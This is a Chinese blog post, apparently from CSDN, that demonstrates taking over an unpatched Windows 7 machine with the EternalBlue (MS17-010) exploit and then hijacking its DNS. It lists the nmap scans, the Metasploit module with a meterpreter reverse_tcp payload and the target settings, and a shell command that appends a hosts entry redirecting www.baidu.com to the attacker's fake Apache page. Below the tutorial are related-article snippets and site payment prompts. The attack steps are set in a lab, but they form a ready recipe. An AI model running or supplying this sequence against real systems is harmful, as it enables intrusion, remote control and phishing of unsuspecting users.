利用永恒之蓝漏洞进行DNS劫持攻击

已于 2023-10-25 17:48:09 修改
阅读量116 收藏 1
点赞数
文章标签: 安全 网络 web安全
于 2023-10-25 17:47:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53221557/article/details/134038298
版权

 1.永恒之蓝漏洞利用的是Windows操作系统中的SMB(Server Message Block)协议的一个安全漏洞,通过发送特制的网络数据包,攻击者可以在目标系统上执行任意代码,从而获取系统权限并控制目标计算机。

DNS劫持攻击是一种网络攻击方法,攻击者通过篡改DNS(Domain Name System)服务器的记录,将用户的域名请求导向恶意网站或者伪装成合法的网站,从而实施欺骗、窃取信息或者进行其他恶意行为。

下面演示的是通过永恒之蓝漏洞获得靶机权限,修改hosts文件的dns代理,从而实现dns劫持。

准备:

靶机:win7(没有打任何补丁),关闭防火墙

攻击机:kali

kali和win7之间能够相互ping通。

开始演示:

1.查看靶机正常状态。

2.回到攻击机(kali),查看这个index.html文件的代码,这是apache官网提供的访问页面,开启apache服务后,本地访问就是这个网页。还有一点就是,我们写的代码也得写在名为index.html这个文件才行。

server apache2 start

cd /var/www/html

3.对index.html这个文件进行备份:

cp index.html index1.html

 vim index.html

4.在index.html文件中写上我们网页的代码,这样一个假的网页就做好了,接下来就是让靶机在访问百度时跳转到我们做好的页面上。

保存退出。

5.先看一下本机的IP地址,然后开始IP嗅探,查看同一网段内存在的主机。

6.用nmap扫描开放的端口。

ip地址为kali的ip地址,扫描这个网段也是可以的。

nmap 192.168.159.136 -sS

nmap 192.168.159.136 --script-smb-vuln-ms17-010

7.打开metasploit.

msfconsole

search ms17-010

use 0

set payload  windows/x64/meterpreter/reverse_tcp

 设置攻击目标的ip地址:

set rhost 192.168.159.135

run

 

getuid

shell

echo 192.168.159.136 www.baidu.com >>C:\windows\System32\drivers\etc\hosts

 ipconfig /flushdns

 

9.回到靶机,查看hosts是否修改成功。

攻击成功。

sorrow°流年
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
DNS劫持与路由器DNS劫持漏洞详解(附防护方法)
不忘初心,护天下安全!
10-10 2404
一、DNS劫持介绍何为DNS劫持,这恐怕还要从DNS的功能说起DNS中文全称为域名系统(英文:DomainNameSystem,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。应用场景十分通俗易懂,用户上网时,没有人去记忆网站服务器的IP地址,一是IP地址太多,二是根本记不住,而且有些网站服务器还要不断的更新IP地址,甚至有些站点需要使用CDN做防护,域名和IP本身就不是一一对应的关系。
DNS劫持新方法(“侧信道攻击“攻破“端口随机化“的研究)
墨痕诉清风的博客
12-03 1764
他告诉我,他们利用这个机制,一边猜端口号和询问单号,一边伪装成目标DNS服务器给权威服务器不停地发请求,让权威DNS服务器把目标DNS服务器给短暂“拉黑”,这样就能“拖住”他们双方之间的通信,为自己的攻击争取更大的窗口期。他们准备了一套收银系统、摄像头,但是最终主办方考虑到舞台网络环境复杂,以及可能引起不必要的误会(比如不明真相的吃瓜群众看到收银系统被黑,可能以为是设备有漏洞,或者误以为是支付宝或者微信支付出了漏洞,三人成虎,以讹传讹,相当可怕),于是他们最终决定取消这些展示,仅展示了劫持手机访问网站。
一比特之差:无需利用漏洞DNS劫持.doc
02-27
一比特之差:无需利用漏洞DNS劫持.doc
开源的 DNS 转发软件 Dnsmasq 被曝7个漏洞,可劫持数百万台设备
smellycat000的专栏
01-20 1441
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队以色列安全咨询公司 JSOF 披露了 Dnsmasq 中的被统称为“DNSpooq” 的7个漏洞,可被用于针对数百万受影响设...
dns劫持以及利用Linux在20ms内只返回50次ping无法链接的漏洞
hero_is_me的博客
12-04 478
this is dns劫持
网络安全学习笔记——DNS漏洞
just do it
11-12 1461
域名和IP地址保存在一个叫Hosts的文件中。早期计算机的IP发生变化需要到互联网管理中心申请变更,主机数量少的时候还可以手动维护,随着主机数量的增加,DNS应运而生。
手把手教你DNS劫持挂马
Ms08067安全实验室
03-12 6921
文章来源|MS08067 内网安全知识星球本文作者:BlackCat(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067首先学习DNS劫持之前,务必要了解下DNS是个什么玩...
子域名劫持(Subdomain Takeover)
Fly_鹏程万里
09-23 1736
 前言 在搜资料的时候偶然发现了这么一种子域名劫持(Subdomain Takeover)漏洞,平时没遇到过,感觉很有趣,可以利用劫持玩出很多花样,同样,HackOne上也有很多例子: https://hackerone.com/reports/172137 https://hackerone.com/reports/32825 https://hackerone.com/reports/...
内网渗透之dns劫持
qq_46258964的博客
07-01 1004
DNS欺骗,被攻击的主机访问任意网站的回被转到特定的钓鱼网站, 实验工具: kali linux 黑客机 win10 肉鸡 apache2 ettercap 操作步骤 1,打开kali上的apache2服务, @kali:~# service apache2 start root@kali:~# service apache2 status 绿点就是已经开启了。 2,制作网页,钓鱼网页不回做,就随便做了一个,命令如下 @kali:~#vim /var/www/html/index.html 3,修改
攻击DNS利用顶级域名配置错误监控Windows域用户
03-01
这种错误例如:有一个权威名称服务器列表,一个域名的权威名称服务器和该名称服务器在上一级顶级名称服务器的设置之间不配置(引起这种问题的原因在“通过劫持DNS解析服务器攻击目标”这篇文章中可以看到)。...
CloudFlare利用API token进行动态dns解析
08-09
CloudFlare利用API token进行动态dns解析 1.下载资源到本地解压 2.修改config.conf中zoneId、recordName、apiKey 3.设置任务计划定时运行updateIpv4.sh或者updateIpv6.sh从而自动更新CloudFlare的动态ip
C++实现DNS劫持
09-08
DNS劫持源代码,用户可以传一个ip当作DNS服务器,被攻击者的dns会自动指向您的欺诈DNS服务器。
德国储能项目锂电池储能集装箱突发火灾:安全挑战再引关注
iotsensor的博客
05-11 275
德国警方估计,此次火灾造成的经济损失约为50万欧元,但更为严重的是,起火原因至今尚未明确,这无疑给储能系统的安全性再次敲响了警钟。在储能系统大规模应用的背景下,如何有效预防和控制锂离子电池的热失控和火灾风险成为了一个亟待解决的问题。目前,虽然技术上尚未有绝对保证锂电池不发生热失控的方法,但通过气体传感器技术等手段对储能电池进行实时监测和预警,仍被视为一种可行的预防措施。针对储能电池热失控,要坚持“早发现,早处置”的原则,对储能集装箱锂电池热失控初级阶级进行超前探测预警,将火灾隐患扑灭在萌芽阶段。
12350 安全生产举报投诉特服热线系统解决方案
05-11 345
随着经济的持续发展和社会的不断进步,安全生产问题日益凸显,成为影响社会稳定和人民福祉的重要因素。在此背景下,加强安全生产监管,提高监管效率和质量显得尤为重要。举报投诉作为安全生产监管的重要手段之一,具有信息来源广泛、反映问题直接、监督作用明显等特点。然而,传统的举报投诉方式往往存在信息传递不畅、处理效率低下等问题,难以满足现代社会对安全生产监管的需求。因此,开发一套高效、智能、安全的特服热线系统,对于提升安全生产监管水平、保障人民群众生命财产安全具有重要意义。
ConcurrentHashMap并发安全的实现
Mr.xing的博客
05-11 17
JDK1.7使用的是分段锁机制,其内部类Segment 继承了ReentrantLock,将容器内的数组划分成多段区域,每个区域对应一把锁,相比于HashTable确实提升了不少并发能力,但在数据量庞大的情况下,性能依然不容乐观,只能通过不断的增加锁来维持并发性能。而JDK1.8则使用了CAS乐观锁 + synchronized 局部锁处理并发问题,锁粒度更细,即使数据量很大也能保证良好的并发性。ConcurrentHashMap并发安全实现源码如下。
针对 % 号 | 引起的 不安全情况
m0_74381444的博客
05-11 485
%%%%%%
「 网络安全常用术语解读 」通用漏洞报告框架CVRF详解
网络安全
05-04 735
ICASI在推进多供应商协调漏洞披露方面处于领先地位,引入了通用漏洞报告框架(Common Vulnerability Reporting Format,CVRF)标准,制定了统一安全事件响应计划(USIRP)的原则,帮助创建了多方漏洞协调和披露指南和实践,并建立了一个成功协调多供应商应对众多安全事件的行业领导者信托小组。为了继续取得这些成功,并确保全球社会更广泛的参与,ICASI(Industry Consortium for Advancement of Security on the Internet
亚信安全发布《2024年第一季度网络安全威胁报告》
最新发布
亚信安全官方账号的博客
05-11 134
亚信安全发布《2024年第一季度网络安全威胁报告》。
AI烟雾监测识别摄像机:智能化安全防范的新利器
bova2022的博客
05-07 365
AI烟雾监测识别摄像机的应用范围广泛,不仅可以安装在家庭、商业建筑、工厂等场所,还可以应用于地铁、火车站等公共场所,为人们的生命财产安全提供全方位的保障。应运而生,成为智能化安全防范的新利器。这种AI烟雾监测识别摄像机,融合了人工智能技术和摄像监控技术,能够实时监测环境中的烟雾情况,并在检测到异常时及时触发警报,以便采取及时有效的灭火措施,最大程度地减少火灾带来的损失。随着现代社会的不断发展,人们对于安全问题的关注日益增加,尤其是在日常生活和工作中,对火灾等意外事件的预防成为了一项重要任务。
抵御arp欺骗攻击、伪AP攻击DNS欺骗攻击DNS劫持攻击的安全配置点有哪些
05-23
4. 防止 DNS 劫持攻击:使用安全 DNS 服务器、禁止使用公共 Wi-Fi 热点、使用 VPN 连接到公司网络等。 除此之外,还可以加强设备和系统的安全配置,如启用防病毒软件、开启防火墙、定期更新操作系统和应用程序等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值